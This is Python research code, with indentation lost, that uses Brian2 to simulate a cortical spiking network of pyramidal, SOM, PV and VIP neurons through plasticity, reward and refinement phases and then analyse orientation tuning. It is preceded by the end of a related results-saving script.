'PYRSOM4_w': monPYRSOM4.w[:],
'currentratio_initial': currentratio_initial,
'currentratio_final': currentratio_final,
#'ampE_initial': ampE_initial,
#'ampE_final': ampE_final,
#'ampI_initial': ampI_initial,
#'ampI_final': ampI_final,
#'amp2E_initial': amp2Ei,
#'amp2E_final': amp2Ef,
#'amp2I_initial': amp2Ii,
#'amp2I_final': amp2If,
#'inh_currents1': neuron1.IsynI[0],
#'exc_currents1': neuron1.IsynE[0],
#'inh_currents2': neuron2.IsynI[0],
#'exc_currents2': neuron2.IsynE[0],
#'inh_currents3': neuron3.IsynI[0],
#'exc_currents3': neuron3.IsynE[0],
#'inh_currents4': neuron4.IsynI[0],
#'exc_currents4': neuron4.IsynE[0],
#'inh_currentsPV': PVneuron1.IsynI[0],
#'exc_currentsPV': PVneuron1.IsynE[0],
#'inh_currentsSOM1': SOMneuron1.IsynI[0],
#'exc_currentsSOM1': SOMneuron1.IsynE[0],
#'inh_currentsSOM2': SOMneuron2.IsynI[0],
#'exc_currentsSOM2': SOMneuron2.IsynE[0],
'PYR0toothers': mona.w,
'otherstoPYR0': monb.w,
'PYR1toothers': monc.w,
'PYR2toothers': mond.w,
'PYR3toothers': mone.w,
'PYRi': PYRi[:],
'PYRt': PYRt[:],
'SSTi': SSTi[:],
'SSTt': SSTt[:],
'PVi': PVi[:],
'PVt': PVt[:],
'VIPi': VIPi[:],
'VIPt': VIPt[:],
'PYRData0_reward': PYRData_reward['0'], # during stimulus 0
'PYRData1_reward': PYRData_reward['1'], # during stimulus 1
'PVData_reward': PVData_reward['0'],
'PVData1_reward': PVData_reward['1'],
'SSTData_reward': SSTData_reward['0'],
'SSTData1_reward': SSTData_reward['1'],
'PYRData0': PYRData_afterreward['0'],
'PYRData1': PYRData_afterreward['1'],
'PVData0': PVData_afterreward['0'],
'PVData1': PVData_afterreward['1'],
'SSTData0': SSTData_afterreward['0'],
'SSTData1': SSTData_afterreward['1'],
'PYRDataAll0': PYRData['0'], # during stimulus 0
'PYRDataAll1': PYRData['1'], # during stimulus 1
'PYRDataAll2': PYRData['2'], # during stimulus 2
'PYRDataAll3': PYRData['3'], # during stimulus 3
'SSTDataAll0': SSTData['0'],
'SSTDataAll1': SSTData['1'],
'SSTDataAll2': SSTData['2'],
'SSTDataAll3': SSTData['3'],
'PVDataAll0': PVData['0'],
'PVDataAll1': PVData['1'],
'PVDataAll2': PVData['2'],
'PVDataAll3': PVData['3'],
'Pyr1rate': PYR1.smooth_rate(window='flat', width=0.5 * ms),
'Pyr2rate': PYR2.smooth_rate(window='flat', width=0.5 * ms),
'Pyr3rate': PYR3.smooth_rate(window='flat', width=0.5 * ms),
'Pyr4rate': PYR4.smooth_rate(window='flat', width=0.5 * ms),
'SOM1rate': SOM1.smooth_rate(window='flat', width=0.5 * ms),
'SOM2rate': SOM2.smooth_rate(window='flat', width=0.5 * ms),
'SOM3rate': SOM3.smooth_rate(window='flat', width=0.5 * ms),
'SOM4rate': SOM4.smooth_rate(window='flat', width=0.5 * ms),
'PVrate': PVmon.smooth_rate(window='flat', width=0.5 * ms),
}
results_file = f'./results/results_tuned{TUNED_ORI}_2.pkl'
print("Saving results to:", results_file)
with open(results_file, 'wb') as f:
pickle.dump(results, f) | 38.664675 | 146 | 0.535618 |
import numpy as np
import pickle
from brian2 import *
from brian2tools import *
from analyse_experiment import *
from plot_Spikingmodel import *
from utils import *
RESULTS_DIR = './results'
TUNED_ORI = 1
def run_network(params):
p = Struct(**params)
total_simtime = p.nonplasticwarmup_simtime + p.warmup_simtime + p.reward_simtime + p.noreward_simtime + p.noSSTPV_simtime + p.after_simtime
total_warmup_simtime = p.nonplasticwarmup_simtime + p.warmup_simtime
stim_time = p.stim_time
input_time = p.input_time
seed(p.seed)
N4 = p.N4
L4_rate = p.L4_rate
gl = p.gl
el = p.el
er = p.er
vt = p.vt
memc = p.memc
tau_gaba = p.tau_gaba
tau_ampa = p.tau_ampa
tau = p.tau_noise
sigma = p.sigma
w_PYR_PV = p.w_PYR_PV
w_PYR_VIP = p.w_PYR_VIP
w_PYR_SOM = p.w_PYR_SOM
w_FFPYR = p.w_FFPYR
w_FFPV = p.w_FFPV
w_FFSOM = p.w_FFSOM
w_TDVIP = p.w_TDVIP
w_L4PYR = p.w_L4PYR
c_gap = p.c_gap
tau_spikelet = p.tau_spikelet
tau_stdp = p.tau_stdp
tau_istdp = p.tau_istdp
relbound = p.relbound
gmax_SSTPV = p.gmax_SSTPV
dApre = p.dApre * nS
dApost = -dApre * tau_stdp / tau_stdp * 1.05
dApre_i = p.dApre_i * nS
dApost_i = -dApre_i * tau_istdp / tau_istdp * 1.05
eqs_FF = '''
rate = L4_rate: Hz
'''
FF = NeuronGroup(1,
eqs_FF,
threshold='rand() < rate*dt',
method='euler',
name='FF')
eqs_layer4 = '''
rate = clip(cos(orientation*2 - selectivity*2), 0, inf)*L4_rate : Hz
stim_rate = rate*int(t<stim_end_time): Hz
gap_rate = (L4_rate*2/5)*int(t>=stim_end_time) : Hz
selectivity : 1 # preferred orientation
orientation : 1 (shared) # orientation of the current stimulus
stim_start_time : second (shared) # start time of the current stimulus
stim_end_time : second (shared) # end time of the current stimulus
'''
layer4 = NeuronGroup(N4,
eqs_layer4,
threshold='rand() < stim_rate *dt',
method='euler',
name='layer4')
gapfiller = NeuronGroup(N4,
'''gap_rate : Hz (linked)''',
threshold='rand() < gap_rate *dt',
method='euler',
name='gapfiller')
gapfiller.gap_rate = linked_var(layer4, 'gap_rate')
layer4.selectivity = '(i%N4)/(1.0*N4)*pi'
runner_code = '''
orientation = ((int(floor(rand()*N4)))%4)/(1.0*4)*pi
stim_start_time = t
stim_end_time = t + stim_time
'''
layer4.run_regularly(runner_code, dt=p.input_time, when='start')
eqs_neurons = '''
dv/dt=(-gl*(v-el)+Isyn+Igap+Ispikelet)/memc + sigma * (2 / tau)**.5 *xi: volt (unless refractory)
Isyn = IsynE + IsynI : amp
IsynE = -g_ampa*v : amp
IsynI = -g_gaba*(v-er) : amp
Igap: amp
dIspikelet/dt = -Ispikelet/tau_spikelet : amp
dg_ampa/dt = -g_ampa/tau_ampa : siemens
dg_gaba/dt = -g_gaba/tau_gaba : siemens
'''
STDP_E = '''
w : siemens
gmax : siemens
dApre/dt = -Apre / tau_stdp : siemens (event-driven)
dApost/dt = -Apost / tau_stdp : siemens (event-driven)
plastic : boolean (shared)
'''
on_pre_STDP_E = '''g_ampa += w
Apre += dApre
w = clip(w + plastic*Apost, 0*nS, gmax)'''
on_post_STDP_E = '''Apost += dApost
w = clip(w + plastic*Apre, 0*nS, gmax)'''
on_pre_antiHebb_IE = '''g_ampa += w
Apre += dApre
w = clip(w - plastic*Apost, 0*nS, gmax)'''
on_post_antiHebb_IE = '''Apost += dApost
w = clip(w - plastic*Apre, 0*nS, gmax)'''
exc_neurons = NeuronGroup(p.NPYR,
model=eqs_neurons,
threshold='v > vt',
reset='v=el',
refractory=2 * ms,
method='euler')
inh_neurons = NeuronGroup(p.NSOM + p.NVIP + p.NPV,
model=eqs_neurons,
threshold='v > vt',
reset='v=el',
refractory=2 * ms,
method='euler')
PYR = exc_neurons[:p.NPYR]
SOM = inh_neurons[:p.NSOM]
VIP = inh_neurons[p.NSOM:int(p.NSOM + p.NVIP)]
PV = inh_neurons[int(p.NSOM + p.NVIP):]
feedforward1 = Synapses(layer4[0:1],
PYR[0:100],
'''w = w_L4PYR: siemens''',
on_pre='g_ampa += w',
name='feedforward1')
feedforward1.connect(p=1)
feedforward2 = Synapses(layer4[1:2],
PYR[100:200],
on_pre='g_ampa += w_L4PYR',
name='feedforward2')
feedforward2.connect(p=1)
feedforward3 = Synapses(layer4[2:3],
PYR[200:300],
on_pre='g_ampa += w_L4PYR',
name='feedforward3')
feedforward3.connect(p=1)
feedforward4 = Synapses(layer4[3:4],
PYR[300:400],
on_pre='g_ampa += w_L4PYR',
name='feedforward4')
feedforward4.connect(p=1)
feedforwardgap1 = Synapses(gapfiller[0:1],
PYR[0:100],
on_pre='g_ampa += w_L4PYR',
name='feedforwardgap1')
feedforwardgap1.connect(p=1)
feedforwardgap2 = Synapses(gapfiller[1:2],
PYR[100:200],
on_pre='g_ampa += w_L4PYR',
name='feedforwardgap2')
feedforwardgap2.connect(p=1)
feedforwardgap3 = Synapses(gapfiller[2:3],
PYR[200:300],
on_pre='g_ampa += w_L4PYR',
name='feedforwardgap3')
feedforwardgap3.connect(p=1)
feedforwardgap4 = Synapses(gapfiller[3:4],
PYR[300:400],
on_pre='g_ampa += w_L4PYR',
name='feedforwardgap4')
feedforwardgap4.connect(p=1)
feedforward_unspec = Synapses(FF,
PYR,
on_pre='g_ampa += w_FFPYR',
name='feedforward_unspec')
feedforward_unspec.connect(p=1)
feedforward_PV = Synapses(FF,
PV,
on_pre='g_ampa += w_FFPV',
name='feedforward_PV')
feedforward_PV.connect(p=1)
feedforward_i1 = Synapses(layer4[0:1],
SOM[0:30],
on_pre='g_ampa += w_FFSOM',
name='feedforward_i1')
feedforward_i1.connect(p=1)
feedforward_i2 = Synapses(layer4[1:2],
SOM[30:60],
on_pre='g_ampa += w_FFSOM',
name='feedforward_i2')
feedforward_i2.connect(p=1)
feedforward_i3 = Synapses(layer4[2:3],
SOM[60:90],
on_pre='g_ampa += w_FFSOM',
name='feedforward_i3')
feedforward_i3.connect(p=1)
feedforward_i4 = Synapses(layer4[3:4],
SOM[90:120],
on_pre='g_ampa += w_FFSOM',
name='feedforward_i4')
feedforward_i4.connect(p=1)
feedforward_gap1 = Synapses(gapfiller[0:1],
SOM[0:30],
on_pre='g_ampa += w_FFSOM*1.1',
name='feedforward_gapi1')
feedforward_gap1.connect(p=1)
feedforward_gap2 = Synapses(gapfiller[1:2],
SOM[30:60],
on_pre='g_ampa += w_FFSOM*1.1',
name='feedforward_gapi2')
feedforward_gap2.connect(p=1)
feedforward_gap3 = Synapses(gapfiller[2:3],
SOM[60:90],
on_pre='g_ampa += w_FFSOM*1.1',
name='feedforward_gapi3')
feedforward_gap3.connect(p=1)
feedforward_gap4 = Synapses(gapfiller[3:4],
SOM[90:120],
on_pre='g_ampa += w_FFSOM*1.1',
name='feedforward_gapi4')
feedforward_gap4.connect(p=1)
on_pre_PCSOM = on_pre_antiHebb_IE
on_post_PCSOM = on_post_antiHebb_IE
PYR_SOM1 = Synapses(PYR[0:100],
SOM[0:30],
STDP_E,
on_pre=on_pre_PCSOM,
on_post=on_post_PCSOM,
name='PYR_SOM1')
PYR_SOM1.connect(p=p.p_PYR_SOM)
PYR_SOM1.w = w_PYR_SOM
PYR_SOM1.gmax = w_PYR_SOM + relbound * nS
PYR_SOM2 = Synapses(PYR[100:200],
SOM[30:60],
STDP_E,
on_pre=on_pre_PCSOM,
on_post=on_post_PCSOM,
name='PYR_SOM2')
PYR_SOM2.connect(p=p.p_PYR_SOM)
PYR_SOM2.w = w_PYR_SOM
PYR_SOM2.gmax = w_PYR_SOM + relbound * nS
PYR_SOM3 = Synapses(PYR[200:300],
SOM[60:90],
STDP_E,
on_pre=on_pre_PCSOM,
on_post=on_post_PCSOM,
name='PYR_SOM3')
PYR_SOM3.connect(p=p.p_PYR_SOM)
PYR_SOM3.w = w_PYR_SOM
PYR_SOM3.gmax = w_PYR_SOM + relbound * nS
PYR_SOM4 = Synapses(PYR[300:400],
SOM[90:120],
STDP_E,
on_pre=on_pre_PCSOM,
on_post=on_post_PCSOM,
name='PYR_SOM4')
PYR_SOM4.connect(p=p.p_PYR_SOM)
PYR_SOM4.w = w_PYR_SOM
PYR_SOM4.gmax = w_PYR_SOM + relbound * nS
Synaptic_model_I = '''w : siemens
gmax_i : siemens
dApre_i/dt = -Apre_i / tau_istdp : siemens (event-driven)
dApost_i/dt = -Apost_i / tau_istdp : siemens (event-driven)
plastic : boolean (shared)'''
on_pre_STDP_I = '''g_gaba += w
Apre_i += dApre_i
w = clip(w + plastic*Apost_i, 0*nS, gmax_i)'''
on_post_STDP_I = '''Apost_i += dApost_i
w = clip(w + plastic*Apre_i, 0*nS, gmax_i)'''
on_pre_antiHebb_I = '''g_gaba += w
Apre_i += dApre_i
w = clip(w - plastic*Apost_i, 0*nS, gmax_i)'''
on_post_antiHebb_I = '''Apost_i += dApost_i
w = clip(w - plastic*Apre_i, 0*nS, gmax_i)'''
con_REC = Synapses(PYR,
PYR,
STDP_E,
on_pre=on_pre_STDP_E,
on_post=on_post_STDP_E,
name='recurrent')
con_REC.connect(p=p.p_PYR_PYR)
con_REC.gmax = p.gmax
con_REC.w = p.recurrent_weights
con_SOM_PV = Synapses(SOM,
PV,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='som2pv')
con_SOM_PV.connect(p=p.p_SOM_PV)
con_SOM_PV.w = p.SOM2PV_weights
con_SOM_PV.gmax_i = p.gmax_SSTPV
con_PYR_PV = Synapses(PYR,
PV,
STDP_E,
on_pre=on_pre_STDP_E,
on_post=on_post_STDP_E,
name='PYR0_PV0')
con_PYR_PV.connect(p=p.p_PYR_PV)
con_PYR_PV.w = w_PYR_PV
con_PYR_PV.gmax = p.w_PYR_PV + relbound * nS
con_PYR_VIP = Synapses(PYR,
VIP,
STDP_E,
on_pre=on_pre_STDP_E,
on_post=on_post_STDP_E,
name='PYR0_VIP0')
con_PYR_VIP.connect(p=p.p_PYR_VIP)
con_PYR_VIP.w = w_PYR_VIP
con_PYR_VIP.gmax = p.w_PYR_VIP + relbound * nS
con_SOM_PYR = Synapses(SOM,
PYR,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='SOMPYR')
con_SOM_PYR.connect(p=p.p_SOM_PYR)
con_SOM_PYR.w = p.w_SOM_PYR
con_SOM_PYR.gmax_i = p.w_SOM_PYR + relbound * nS
con_SOM_VIP = Synapses(SOM,
VIP,
Synaptic_model_I,
on_pre='''g_gaba += w
Apre_i += dApre_i
w = clip(w + plastic*.1*Apost_i, 0*nS, gmax_i)''',
on_post='''Apost_i += dApost_i
w = clip(w + plastic*.1*Apre_i, 0*nS, gmax_i)''',
name='SOMVIP')
con_SOM_VIP.connect(p=p.p_SOM_VIP)
con_SOM_VIP.w = p.w_SOM_VIP
con_SOM_VIP.gmax_i = p.w_SOM_VIP + relbound * nS
con_SOM_SOM = Synapses(SOM,
SOM,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='SOMSOM')
con_SOM_SOM.connect(p=p.p_SOM_SOM)
con_SOM_SOM.w = p.w_SOM_SOM
con_SOM_SOM.gmax_i = p.w_SOM_SOM + relbound * nS
con_PV_PYR = Synapses(PV,
PYR,
Synaptic_model_I,
on_pre=on_pre_antiHebb_I,
on_post=on_post_antiHebb_I,
name='PVPYR')
con_PV_PYR.connect(p=p.p_PV_PYR)
con_PV_PYR.w = p.w_PV_PYR
con_PV_PYR.gmax_i = p.w_PV_PYR + relbound * nS
con_PV_SOM = Synapses(PV,
SOM,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='PVSOM')
con_PV_SOM.connect(p=p.p_PV_SOM)
con_PV_SOM.w = p.w_PV_SOM
con_PV_SOM.gmax_i = p.w_PV_SOM + relbound * nS
con_PV_VIP = Synapses(PV,
VIP,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='PVVIP')
con_PV_VIP.connect(p=p.p_PV_VIP)
con_PV_VIP.w = p.w_PV_VIP
con_PV_VIP.gmax_i = p.w_PV_VIP + relbound * nS
con_PV_PV = Synapses(PV,
PV,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='PVPV')
con_PV_PV.connect(p=p.p_PV_PV)
con_PV_PV.w = p.w_PV_PV
con_PV_PV.gmax_i = p.w_PV_PV + relbound * nS
on_pre_VIPSOM = on_pre_antiHebb_I
on_post_VIPSOM = on_post_antiHebb_I
con_VIP_SOM = Synapses(VIP,
SOM,
Synaptic_model_I,
on_pre=on_pre_VIPSOM,
on_post=on_post_VIPSOM,
name='VIPSOM')
con_VIP_SOM.connect(p=p.p_VIP_SOM)
con_VIP_SOM.w = p.w_VIP_SOM
con_VIP_SOM.gmax_i = p.w_VIP_SOM + relbound * nS
con_VIP_PYR = Synapses(VIP,
PYR,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='VIPPYR')
con_VIP_PYR.connect(p=p.p_VIP_PYR)
con_VIP_PYR.w = p.w_VIP_PYR
con_VIP_PYR.gmax_i = p.w_VIP_PYR + relbound * nS
con_VIP_PV = Synapses(VIP,
PV,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='VIPPV')
con_VIP_PV.connect(p=p.p_VIP_PV)
con_VIP_PV.w = p.w_VIP_PV
con_VIP_PV.gmax_i = p.w_VIP_PV + relbound * nS
con_VIP_VIP = Synapses(VIP,
VIP,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='VIPVIP')
con_VIP_VIP.connect(p=p.p_VIP_VIP)
con_VIP_VIP.w = p.w_VIP_VIP
con_VIP_VIP.gmax_i = p.w_VIP_VIP + relbound * nS
PVPV_gap = Synapses(
PV,
PV,
'''w : siemens
Igap_post = w * (v_pre - v_post) : amp (summed)''',
on_pre='Ispikelet+=c_gap',
)
PVPV_gap.connect()
PVPV_gap.w = p.w_gap
TD = NeuronGroup(p.NTD,
model=eqs_neurons,
threshold='v > vt',
reset='v=el',
refractory=2 * ms,
method='euler')
con_ff_td = Synapses(layer4[TUNED_ORI:TUNED_ORI + 1],
TD,
on_pre='g_ampa += 0.3*nS')
con_ff_td.connect(p=p.p_L4_TD)
con_topdown = Synapses(TD, VIP, on_pre='g_ampa += w_TDVIP')
con_topdown.connect(p=p.p_TD_VIP)
store('nonplasticwarmup', filename='checkpoints/test.pkl')
restore('afternoSSTPV', filename='checkpoints/test2.pkl')
Stimmonitor = SpikeMonitor(layer4, variables=['orientation'])
monPYRPV = StateMonitor(con_PYR_PV, 'w', record=True, dt=1000 * ms)
monVIPSOM = StateMonitor(con_VIP_SOM, 'w', record=True, dt=1000 * ms)
monVIPPV = StateMonitor(con_VIP_PV, 'w', record=True, dt=1000 * ms)
monVIPPYR = StateMonitor(con_VIP_PYR, 'w', record=True, dt=1000 * ms)
monPVPYR = StateMonitor(con_PV_PYR, 'w', record=True, dt=1000 * ms)
monPVSOM = StateMonitor(con_PV_SOM, 'w', record=True, dt=1000 * ms)
monPVPV = StateMonitor(con_PV_PV, 'w', record=True, dt=1000 * ms)
monPVVIP = StateMonitor(con_PV_VIP, 'w', record=True, dt=1000 * ms)
monSOMVIP = StateMonitor(con_SOM_VIP, 'w', record=True, dt=1000 * ms)
monSOMPYR = StateMonitor(con_SOM_PYR, 'w', record=True, dt=1000 * ms)
monSOMSOM = StateMonitor(con_SOM_SOM, 'w', record=True, dt=1000 * ms)
monPYRSOM1 = StateMonitor(PYR_SOM1, 'w', record=True, dt=1000 * ms)
monPYRSOM2 = StateMonitor(PYR_SOM2, 'w', record=True, dt=1000 * ms)
monPYRSOM3 = StateMonitor(PYR_SOM3, 'w', record=True, dt=1000 * ms)
monPYRSOM4 = StateMonitor(PYR_SOM4, 'w', record=True, dt=1000 * ms)
monPYRVIP = StateMonitor(con_PYR_VIP, 'w', record=True, dt=1000 * ms)
monVIPVIP = StateMonitor(con_VIP_VIP, 'w', record=True, dt=1000 * ms)
mona = StateMonitor(con_REC,
'w',
record=con_REC[0:100, 100:400],
dt=100 * ms)
monb = StateMonitor(con_REC,
'w',
record=con_REC[100:400, 0:100],
dt=100 * ms)
monc = StateMonitor(con_REC,
'w',
record=con_REC[100:200, 200:400],
dt=100 * ms)
mond = StateMonitor(
con_REC,
'w',
record=con_REC[
'(i>=200) and (i<300) and (((j>=100) and (j<200)) or (j>300))'],
dt=100 * ms)
mone = StateMonitor(con_REC,
'w',
record=con_REC[300:400, 100:300],
dt=100 * ms)
PYR1 = PopulationRateMonitor(PYR[0:100])
PYR2 = PopulationRateMonitor(PYR[100:200])
PYR3 = PopulationRateMonitor(PYR[200:300])
PYR4 = PopulationRateMonitor(PYR[300:400])
SOM1 = PopulationRateMonitor(SOM[0:30])
SOM2 = PopulationRateMonitor(SOM[30:60])
SOM3 = PopulationRateMonitor(SOM[60:90])
SOM4 = PopulationRateMonitor(SOM[90:120])
PVmon = PopulationRateMonitor(PV)
VIPmon = PopulationRateMonitor(VIP)
monSOMPV = StateMonitor(con_SOM_PV, 'w', record=True, dt=1000 * ms)
SOM0PV = StateMonitor(con_SOM_PV, 'w', record=con_SOM_PV[:30:10, ::40])
SOMotherPV = StateMonitor(con_SOM_PV,
'w',
record=con_SOM_PV[30::10, 1::40])
sm_PYR = SpikeMonitor(PYR)
sm_VIP = SpikeMonitor(VIP)
sm_SOM = SpikeMonitor(SOM)
sm_PV = SpikeMonitor(PV)
sm_TD = SpikeMonitor(TD)
sm_layer4 = SpikeMonitor(layer4)
sm_FF = SpikeMonitor(FF)
sm_gap = SpikeMonitor(gapfiller)
defaultclock.dt = p.timestep
con_ff_td.active = False
TD.active = False
con_REC.plastic = False
con_SOM_PV.plastic = False
con_PYR_PV.plastic = False
PYR_SOM1.plastic = False
PYR_SOM2.plastic = False
PYR_SOM3.plastic = False
PYR_SOM4.plastic = False
con_PYR_VIP.plastic = False
con_VIP_SOM.plastic = False
con_VIP_PV.plastic = False
con_VIP_VIP.plastic = False
con_VIP_PYR.plastic = False
con_SOM_PYR.plastic = False
con_SOM_VIP.plastic = False
con_SOM_SOM.plastic = False
con_PV_SOM.plastic = False
con_PV_PYR.plastic = False
con_PV_VIP.plastic = False
con_PV_PV.plastic = False
conREC_start = np.copy(con_REC.w[:])
run(p.nonplasticwarmup_simtime, report='text')
store('nonplasticwarmup')
print('non-plastic warmup done')
restore('nonplasticwarmup')
con_ff_td.active = False
TD.active = False
con_REC.plastic = True
con_SOM_PV.plastic = True
if p.restplastic == True:
con_VIP_SOM.plastic = True
con_PYR_PV.plastic = True
con_PV_PYR.plastic = True
con_PYR_VIP.plastic = True
PYR_SOM1.plastic = True
PYR_SOM2.plastic = True
PYR_SOM3.plastic = True
PYR_SOM4.plastic = True
con_VIP_PV.plastic = True
con_VIP_VIP.plastic = True
con_VIP_PYR.plastic = True
con_SOM_PYR.plastic = True
con_SOM_VIP.plastic = True
con_SOM_SOM.plastic = True
con_PV_SOM.plastic = True
con_PV_VIP.plastic = True
con_PV_PV.plastic = True
else:
con_PYR_PV.plastic = False
PYR_SOM1.plastic = False
PYR_SOM2.plastic = False
PYR_SOM3.plastic = False
PYR_SOM4.plastic = False
con_PYR_VIP.plastic = False
con_VIP_SOM.plastic = False
con_VIP_PV.plastic = False
con_VIP_VIP.plastic = False
con_VIP_PYR.plastic = False
con_SOM_PYR.plastic = False
con_SOM_VIP.plastic = False
con_SOM_SOM.plastic = False
con_PV_SOM.plastic = False
con_PV_PYR.plastic = False
con_PV_VIP.plastic = False
con_PV_PV.plastic = False
print('starting warmup')
run(p.warmup_simtime, report='text')
conREC_afterwarmup = np.copy(con_REC.w[:])
sstpv_w_afterwarmup = np.copy(con_SOM_PV.w[:])
store('afterwarmup')
print('warmup done')
restore('afterwarmup')
con_ff_td.active = True
TD.active = True
con_REC.plastic = True
con_SOM_PV.plastic = True
print('starting reward period')
run(p.reward_simtime, report='text')
impact_afterreward, impactmax_afterreward = calc_impact(con_REC.w)
print('calculated impacts')
conREC_afterreward = np.copy(con_REC.w[:])
print('copied con_Rec')
sstpv_w_afterreward = np.copy(con_SOM_PV.w[:])
print('copied sstpv')
store('afterreward')
print('rewarded phase done')
restore('afterreward')
con_SOM_PV.plastic = True
con_ff_td.active = False
con_topdown.active = False
TD.active = False
print('starting refinement phase')
run(p.noreward_simtime, report='text')
store('afternoreward')
print('45s of refinement phase done')
restore('afternoreward')
con_ff_td.active = False
TD.active = False
con_REC.plastic = True
con_SOM_PV.plastic = True
run(p.noSSTPV_simtime, report='text')
store('afternoSSTPV')
print('refinement phase done')
restore('afternoSSTPV')
con_ff_td.active = False
TD.active = False
con_REC.plastic = False
con_SOM_PV.plastic = False
con_PYR_PV.plastic = False
PYR_SOM1.plastic = False
PYR_SOM2.plastic = False
PYR_SOM3.plastic = False
PYR_SOM4.plastic = False
con_PYR_VIP.plastic = False
con_VIP_SOM.plastic = False
con_VIP_PV.plastic = False
con_VIP_VIP.plastic = False
con_VIP_PYR.plastic = False
con_SOM_PYR.plastic = False
con_SOM_VIP.plastic = False
con_SOM_SOM.plastic = False
con_PV_SOM.plastic = False
con_PV_PYR.plastic = False
con_PV_VIP.plastic = False
con_PV_PV.plastic = False
run(p.after_simtime, report='text')
PYR_spiketrains = sm_PYR.spike_trains()
SOM_spiketrains = sm_SOM.spike_trains()
VIP_spiketrains = sm_VIP.spike_trains()
PV_spiketrains = sm_PV.spike_trains()
stimuli_t = Stimmonitor.t
PYRi, PYRt = sm_PYR.it
SSTi, SSTt = sm_SOM.it
PVi, PVt = sm_PV.it
VIPi, VIPt = sm_VIP.it
gapi, gapt = sm_gap.it
results = {
'PYR_spike_train': PYR_spiketrains,
'SOM_spike_train': SOM_spiketrains,
'VIP_spike_train': VIP_spiketrains
}
results_file = RESULTS_DIR + f'/results_tuned{TUNED_ORI}_1.pkl'
print('Saving results to: ' + results_file)
if not os.path.exists(RESULTS_DIR):
os.mkdir(RESULTS_DIR)
with open(results_file, 'wb') as f:
pickle.dump(results, f)
impact, impactmax = calc_impact(con_REC.w)
no_stimuli = 4
reward_endtime = total_warmup_simtime + p.reward_simtime
first, endofreward, startofnonreward, last = get_particular_stimulus_times(
Stimmonitor.orientation, Stimmonitor.t, no_stimuli, reward_endtime,
reward_endtime)
tuning_rewardend = get_spike_response(PYR_spiketrains,
no_stimuli,
p.input_time,
last=endofreward)
tuning_after_rewardend = get_spike_response(PYR_spiketrains,
no_stimuli,
p.input_time,
first=startofnonreward)
tuning_initial = get_tuning_avgoverperiod(PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=p.input_time,
upto=p.nonplasticwarmup_simtime)
tuning_afterwarmup = get_tuning_avgoverperiod(
PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime - p.nonplasticwarmup_simtime,
upto=total_warmup_simtime)
tuning_duringreward = get_tuning_avgoverperiod(
PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime -
p.nonplasticwarmup_simtime,
upto=total_warmup_simtime + p.reward_simtime)
tuning_afterreward = get_tuning_avgoverperiod(
PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime,
upto=total_warmup_simtime + p.reward_simtime +
p.nonplasticwarmup_simtime)
tuning_final = get_tuning_avgoverperiod(PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_simtime -
p.after_simtime,
upto=total_simtime)
stimtuning_initial = get_tuning_avgoverperiod(
PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
stim_time,
startat=p.input_time,
upto=p.nonplasticwarmup_simtime)
stimtuning_final = get_tuning_avgoverperiod(PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
stim_time,
startat=total_simtime -
p.after_simtime,
upto=total_simtime)
stimPVtuning_initial = get_tuning_avgoverperiod(
PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
stim_time,
startat=p.input_time,
upto=p.nonplasticwarmup_simtime)
stimPVtuning_final = get_tuning_avgoverperiod(PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
stim_time,
startat=total_simtime -
p.after_simtime,
upto=total_simtime)
PVtuning_initial = get_tuning_avgoverperiod(
PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=p.input_time,
upto=p.nonplasticwarmup_simtime)
PVtuning_afterwarmup = get_tuning_avgoverperiod(
PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime - p.nonplasticwarmup_simtime,
upto=total_warmup_simtime)
PVtuning_duringreward = get_tuning_avgoverperiod(
PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime -
p.nonplasticwarmup_simtime,
upto=total_warmup_simtime + p.reward_simtime)
PVtuning_afterreward = get_tuning_avgoverperiod(
PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime,
upto=total_warmup_simtime + p.reward_simtime +
p.nonplasticwarmup_simtime)
PVtuning_final = get_tuning_avgoverperiod(PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_simtime -
p.after_simtime,
upto=total_simtime)
VIPtuning_initial = get_tuning_avgoverperiod(
VIP_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=p.input_time,
upto=p.nonplasticwarmup_simtime)
VIPtuning_afterwarmup = get_tuning_avgoverperiod(
VIP_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime - p.nonplasticwarmup_simtime,
upto=total_warmup_simtime)
VIPtuning_duringreward = get_tuning_avgoverperiod(
VIP_spiketrains,
